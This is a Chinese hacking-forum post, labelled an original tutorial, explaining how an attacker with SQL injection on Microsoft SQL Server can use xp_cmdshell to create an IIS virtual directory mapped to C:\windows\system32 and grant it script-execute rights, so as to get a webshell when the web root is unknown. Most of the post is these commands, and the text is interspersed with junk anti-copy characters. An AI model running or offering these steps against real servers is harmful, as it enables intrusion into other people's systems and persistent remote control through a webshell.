返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:& d$ }+ K( w- [1 X! I/ E

$ {7 S, F- V, Y. d7 }, s% Xexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'- K  w9 n3 b, I# w% ~- k, a9 s
建立虚拟目录win,指向c:\windows\system32+ o/ t# @! f5 |4 k) r, Y
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'# u, ^6 {/ [) ~4 C( Y
让win句有解析asp脚本权限: r1 c+ y. t1 I5 Y$ g$ d

4 w: K! ^2 h- _* w+ E7 J1 mexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/": w/ S) ^' O' W: L
删除虚拟目录。) ]' i4 ~1 D. E
找不到web绝对路径的一种解决办法,
4 ]; c( c9 d! t$ _  \2 C$ I9 n4 `7 A/ F9 b3 b# v" |
403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表